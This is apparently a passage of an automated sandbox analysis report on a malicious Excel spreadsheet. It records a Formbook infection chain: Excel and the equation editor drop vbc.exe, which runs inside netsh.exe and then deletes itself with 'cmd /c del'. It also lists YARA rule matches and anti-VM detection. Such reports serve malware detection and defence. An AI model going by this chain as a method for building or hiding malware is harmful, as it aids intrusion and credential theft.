Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401BB8	6_2_00401BB8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0E420	6_2_04F0E420
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0C641	6_2_04F0C641
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04EF0048	6_2_04EF0048
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0D210	6_2_04F0D210
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0DD58	6_2_04F0DD58
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0DA72	6_2_04F0DA72
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04EF0006	6_2_04EF0006
Source: C:\Users\Public\vbc.exe	Code function: 6_2_04F0D1F6	6_2_04F0D1F6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B6C0	6_2_0137B6C0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00401030	7_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B8B1	7_2_0041B8B1
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B963	7_2_0041B963
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00408C4B	7_2_00408C4B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00408C50	7_2_00408C50
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B493	7_2_0041B493
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B496	7_2_0041B496
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041C539	7_2_0041C539
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402D89	7_2_00402D89
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402D90	7_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041CE85	7_2_0041CE85
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041BF12	7_2_0041BF12
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041C795	7_2_0041C795
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402FB0	7_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B673	7_2_0137B673
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008CE0C6	7_2_008CE0C6
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008FD005	7_2_008FD005
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D3040	7_2_008D3040
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008E905A	7_2_008E905A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008CE2E9	7_2_008CE2E9
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00971238	7_2_00971238
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008CF3CF	7_2_008CF3CF
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008F63DB	7_2_008F63DB
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D2305	7_2_008D2305
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D7353	7_2_008D7353
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0091A37B	7_2_0091A37B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008E1489	7_2_008E1489
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00905485	7_2_00905485
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008EC5F0	7_2_008EC5F0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D351F	7_2_008D351F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D4680	7_2_008D4680
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008DE6C1	7_2_008DE6C1
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00972622	7_2_00972622
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095579A	7_2_0095579A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008DC7BC	7_2_008DC7BC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0096F8EE	7_2_0096F8EE
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008DC85C	7_2_008DC85C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008F286D	7_2_008F286D
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0097098E	7_2_0097098E
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D29B2	7_2_008D29B2
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008E69FE	7_2_008E69FE
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00955955	7_2_00955955
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00983A83	7_2_00983A83
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0097CBA4	7_2_0097CBA4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095DBDA	7_2_0095DBDA
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008CFBD7	7_2_008CFBD7
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008F7B00	7_2_008F7B00
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0096FDDD	7_2_0096FDDD
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00900D3B	7_2_00900D3B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008DCD5B	7_2_008DCD5B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00902E2F	7_2_00902E2F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008EEE4C	7_2_008EEE4C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008E0F3F	7_2_008E0F3F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008FDF7C	7_2_008FDF7C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B6C0	7_2_0137B6C0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020F1238	9_2_020F1238
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204E2E9	9_2_0204E2E9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02052305	9_2_02052305
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02057353	9_2_02057353
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0209A37B	9_2_0209A37B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204F3CF	9_2_0204F3CF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020763DB	9_2_020763DB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0207D005	9_2_0207D005
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02053040	9_2_02053040
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0206905A	9_2_0206905A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204E0C6	9_2_0204E0C6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020F2622	9_2_020F2622
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02054680	9_2_02054680
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0205E6C1	9_2_0205E6C1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020D579A	9_2_020D579A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0205C7BC	9_2_0205C7BC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020857C3	9_2_020857C3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02085485	9_2_02085485
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02061489	9_2_02061489
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0205351F	9_2_0205351F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0206C5F0	9_2_0206C5F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02103A83	9_2_02103A83
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02077B00	9_2_02077B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020FCBA4	9_2_020FCBA4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204FBD7	9_2_0204FBD7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020DDBDA	9_2_020DDBDA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0205C85C	9_2_0205C85C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0207286D	9_2_0207286D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020EF8EE	9_2_020EF8EE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020D5955	9_2_020D5955
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020F098E	9_2_020F098E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020529B2	9_2_020529B2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020669FE	9_2_020669FE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02082E2F	9_2_02082E2F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0206EE4C	9_2_0206EE4C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02060F3F	9_2_02060F3F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0207DF7C	9_2_0207DF7C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02080D3B	9_2_02080D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0205CD5B	9_2_0205CD5B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020EFDDD	9_2_020EFDDD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020B493	9_2_0020B493
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020B496	9_2_0020B496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020C539	9_2_0020C539
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020C795	9_2_0020C795
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020B8B1	9_2_0020B8B1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020B954	9_2_0020B954
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_001F8C50	9_2_001F8C50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_001F8C4B	9_2_001F8C4B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_001F2D90	9_2_001F2D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_001F2D89	9_2_001F2D89
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020CE85	9_2_0020CE85
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020BF12	9_2_0020BF12
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_001F2FB0	9_2_001F2FB0

Source: C:\Users\Public\vbc.exe	Code function: String function: 008CE2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0093F970 appears 81 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00913F92 appears 106 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0091373B appears 238 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008CDF5C appears 105 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 0204DF5C appears 107 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 02093F92 appears 108 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 0209373B appears 238 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 020BF970 appears 81 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 0204E2A8 appears 38 times

Source: dun[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/19@6/6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$oustanding 03082921.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE629.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: oustanding 03082921.xlsx

ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: oustanding 03082921.xlsx

Static file information: File size 1328640 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: netsh.pdb source: vbc.exe, 00000007.00000002.2198845306.00000000004E9000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137C836 push es; retf	6_2_0137C973
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137C976 push es; retf 0001h	6_2_0137C9C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137C976 push es; ret	6_2_0137CB53
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137C976 push es; retn 0001h	6_2_0137CBA3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B673 push es; iretd	6_2_0137C833
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B673 push es; retf	6_2_0137C973
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B673 push es; retf 0001h	6_2_0137C9C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137C9C6 push es; ret	6_2_0137CB53
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004078F4 push esp; ret	6_2_004078FD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B6C0 push es; iretd	6_2_0137C833
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B2A2 push cs; ret	7_2_0041B2A3
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B3F2 push eax; ret	7_2_0041B3F8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B3FB push eax; ret	7_2_0041B462
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B3A5 push eax; ret	7_2_0041B3F8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B45C push eax; ret	7_2_0041B462
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00415414 push esp; ret	7_2_00415416
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00414F46 push cs; ret	7_2_00414F47
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041BF12 push dword ptr [8427D5C5h]; ret	7_2_0041C1FF
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00415FC5 push ebp; ret	7_2_00415FC6
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137C976 push es; retf 0001h	7_2_0137C9C3
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137C976 push es; ret	7_2_0137CB53
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137C976 push es; retn 0001h	7_2_0137CBA3
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137C9C6 push es; ret	7_2_0137CB53
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137C836 push es; retf	7_2_0137C973
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B673 push es; iretd	7_2_0137C833
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B673 push es; retf	7_2_0137C973
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B673 push es; retf 0001h	7_2_0137C9C3
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008CDFA1 push ecx; ret	7_2_008CDFB4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B6C0 push es; iretd	7_2_0137C833
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204DFA1 push ecx; ret	9_2_0204DFB4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020B2A2 push cs; ret	9_2_0020B2A3

Source: initial sample	Static PE information: section name: .text entropy: 6.91186053545
Source: initial sample	Static PE information: section name: .text entropy: 6.91186053545

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

